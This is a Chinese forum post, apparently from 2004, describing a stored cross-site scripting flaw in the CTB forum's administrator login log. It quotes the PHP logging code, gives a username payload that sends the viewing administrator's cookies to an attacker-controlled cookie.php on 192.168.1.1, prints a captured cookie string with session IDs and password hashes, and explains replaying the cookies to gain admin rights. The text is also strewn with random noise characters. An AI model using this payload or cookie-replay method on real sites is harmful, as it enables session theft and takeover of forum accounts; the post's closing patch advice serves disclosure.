QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2535|回复: 0
打印 上一主题 下一主题

CTB论坛再探

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 12:02 |只看该作者 |正序浏览
|招呼Ta 关注Ta
在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看,可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中,我们可以通过递交特殊的语句来进行跨站攻击,从而直接得到密码。 , r- ]& K- y( F 7 v& I" A7 u6 C1 p( t  我们看看admin目录下的login.php文件的日志处理部分的代码: 9 C/ y* n/ S, o- h7 j3 X - b0 n- Y' j; s9 Q/ | S4 g6 Z) n代码: , @! @* ?5 f: O -------------------------------------------------------------------------------- - O. ~# x. P1 T. |+ ~5 u7 _5 { ( \* ?* b+ q7 z( W( h//后台管理员登陆日志 # p1 w6 I t7 | function adminLoginLog($check="ok") 7 W& D8 I( e1 D" Y8 q4 P1 ]: Q{ 3 P- {: _8 d$ _" ~ if($this->set[logRecord] == "N"){ + N: J }: b1 ?, m( S4 k' z0 r1 D5 O return false; ! z* w, u" _5 _2 j& A } " e k$ S; |; L. p* L9 | $msgArray[phpCode] = $this->code; " U+ I# ]! k& l/ \ W! Q2 q L //判断文件大小是否需要清空 S5 f+ e& `; s6 q I% Z5 F: X! x( B# b if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){ 9 B4 _7 c# ~+ D- \4 G% \ $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; 8 A# W/ J: {6 Y& r( P $this->null_write(""); * p* J8 p* @6 k$ H4 g } " [0 r f. _" \$ r" m //登陆错误 1 e) S: \: q$ C; I //省去部分代码........ & [9 H3 c$ k0 A- s# e$ I1 `; d/ A# _ //登陆失败 m) x; k% X; N8 k) J! I else { 3 q+ w$ r: l3 l `9 Y $msgArray[loginMode] = 0; 2 T! Z) e m( \1 c' \" V1 i( F1 | $msgArray[loginId] = $this->input['userName']; 2 q( g T6 u; Q/ {, Y' f: d3 r $msgArray[wrongMsg] = $check; ; x/ r* K3 ?- S1 D3 q `+ T$ { $msgArray[userIp] = $this->ip; - a2 @, X" c4 A, B+ m. v% j) N6 ~9 x $msgArray[loginTime] = time(); ( S& A! O7 w; U $msgArray[temp1] = ""; //备用 6 e3 V& S$ Y& d/ a $msgArray[temp2] = ""; //备用 - `" M: K/ ~( c" p( }; G $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; " `0 E' C2 v3 R $this->add_line($msgArray); 2 r B. H: c6 a: k5 @# s } " e+ h- v; E. R, _& } } ; x5 p) e9 H& D- E : f1 F* D% |! Z' B-------------------------------------------------------------------------------- ( A% w1 j) _* ]2 Y3 @( k 7 B) l1 g& w3 Y3 X/ _   从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去,当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息,我们也就可以通过这个方法来得到管理员的ID和密码等信息。 9 ^# z, l* F; F5 g' {, k: }( i% x, Q9 ` X- w' f   我们打开后台登陆页面,在用户名那里输入: 1 F& C/ j- C; s; z: ]: n; c E, J , ~% t- D' Z- N$ `3 c3 ]/ y2 ~) z代码: . h3 y' T5 H" \$ l -------------------------------------------------------------------------------- ; x6 M- }0 G8 {3 U* f/ O $ i7 l: ]! D$ ?4 d( E- n<img src="javascript:window.open('http://192.168.1.1/cookie.php?'+document.cookie)"> " ^% u' ?. r- d $ j. F" z6 `3 t0 s -------------------------------------------------------------------------------- ; o: H1 T! G" e% [; R$ K 6 J6 G& E z8 F  因为无论登陆成功否,程序都会进行记录,所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址,cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了,只要管理员一查看后台登陆日志,我们的PHP程序就会把他的COOKIE截取下来。 9 Z+ ~" i F( } \& {) _ " {3 g) C7 g0 \  让我们看看截取到的文件内容: . ~# Y7 e0 \8 c9 o1 ]7 Y1 W9 T 9 F7 u0 |* i; G. L8 h# e; m 引用: : q9 {: t% T( X9 [-------------------------------------------------------------------------------- ! P# }: h# O/ p O# @# c9 l E3 k ctb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503 4 {1 Z# n0 t* S" Z # z& z5 }8 w' _/ Z, P! z( K -------------------------------------------------------------------------------- $ q" x; B; M8 t% R. h. f2 Y# }4 l( B/ u9 g   我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了,有了这些信息,我们要获得前台管理员权限就非常容易,用IECookieView找到我们要编辑的COOKIE,把相应的部分替换掉,保存后再进入该站点你就是前台管理员了。 ( u6 Z0 F: b$ [* t" q 8 o( P+ }% t" A* ^  很简单的我们就得到了论坛的管理权限,如果被人利用,那么相信后果是非常严重的,希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况,尽快修补该漏洞,以免造成不必要的损失。 7 ?5 J+ Q1 ?- R3 E

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-9-3 08:20 , Processed in 0.611206 second(s), 52 queries .

回顶部